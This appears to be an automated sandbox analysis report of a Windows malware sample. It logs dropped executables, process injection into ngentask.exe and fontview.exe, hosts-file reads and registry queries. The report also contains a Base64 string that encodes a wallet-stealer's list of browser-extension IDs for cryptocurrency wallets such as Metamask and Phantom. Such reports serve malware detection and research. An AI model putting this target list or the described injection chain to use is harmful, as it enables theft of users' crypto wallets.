Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RtlDllShutdownInProgress_p0.System......./UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\beirutt C:\Users\user\AppData\Roaming\beirutt
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{993BE281-6695-4BA5-8A2A-7AACBFAAB69E}\InprocServer32

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\C676.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007B005C CreateToolhelp32Snapshot,Module32First,

Source: 9.3.C4AA.exe.df30000.1.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 9.3.C4AA.exe.df30000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 12.2.ngentask.exe.400000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Users\user\AppData\Roaming\beirutt

Command line argument: neyijabizux

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINMMBASE.pdbUGP source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: fontview.exe, 0000000D.00000003.521974726.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522197906.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdbGCTL source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source:	Binary string: setupapi.pdbUGP source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdb source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdb source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdb source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winmm.pdbUGP source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbUGP source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: shell32.pdb source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdbUGP source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: C4AA.exe, 00000009.00000000.469180879.00000000009BC000.00000002.00000001.01000000.00000009.sdmp, C4AA.exe, 00000009.00000002.573291842.00000000009BC000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: msvcp_win.pdb source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: psapi.pdbUGP source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdbUGP source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdb source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
